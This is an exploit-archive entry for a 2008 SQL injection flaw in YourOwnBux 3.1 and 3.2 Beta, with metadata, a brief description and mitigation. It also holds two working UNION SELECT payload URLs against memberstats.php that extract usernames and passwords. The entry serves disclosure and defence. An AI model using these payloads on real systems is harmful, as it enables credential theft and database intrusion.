header-logo
Suggest Exploit
vendor:
YourOwnBux
by:
~!Dok_tOR!~
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: YourOwnBux
Affected Version From: 3.1
Affected Version To: 3.2 Beta
Patch Exists: YES
Related CWE: N/A
CPE: yourownbux
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

The vulnerability exists in YourOwnBux 3.1 and 3.2 Beta versions due to insufficient sanitization of user-supplied input in the 'user' parameter of the 'memberstats.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. This can allow the attacker to execute arbitrary SQL commands on the underlying database, allowing them to access sensitive information such as usernames and passwords.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in SQL queries.
Source

Exploit-DB raw data:

YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Date found: 28.08.08
Product: YourOwnBux
Version: 3.1, 3.2
Price: $39.99
DEMO: yourownbux.com/demos/
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

3.2 Beta version

Exploit:

http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19+from+tb_users/*

3.1 version

Exploit:

http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18+from+tb_users/*

# milw0rm.com [2008-08-27]

Navigation

Suggest Exploit

Services By CQR